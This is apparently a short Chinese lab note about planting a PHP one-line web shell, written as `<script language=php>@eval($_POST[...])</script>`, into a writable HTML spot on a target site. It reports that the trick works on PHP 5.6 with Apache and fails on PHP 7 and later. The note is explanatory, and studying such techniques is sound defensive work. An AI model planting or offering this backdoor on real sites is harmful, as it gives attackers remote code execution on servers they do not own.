在目标站有可写的html点时可以使用
0x00 准备环境
环境使用的是:PHP Version 5.6.27+Apach
0x01 开始实验
准备的代码为(这里用的虽然是js其实最后还是用了php)
1 | <script language=php>@eval($_POST['web']);</script> |
在这里我们先用纯Html做一次测试
我们访问html页面发现并没有任何反应
我们再次访问php页面查看结果发现phpinfo出现在了页面上
这里再测试一下可以利用的版本发现7以上的版本都不能顺利执行
0x02 总结
利用条件已经很明确了,必须要php下确实存在的才可以被利用,这个方法可用完全是因为php支持html的原因,php7移除该方法,其实利用条件还是比较苛刻的。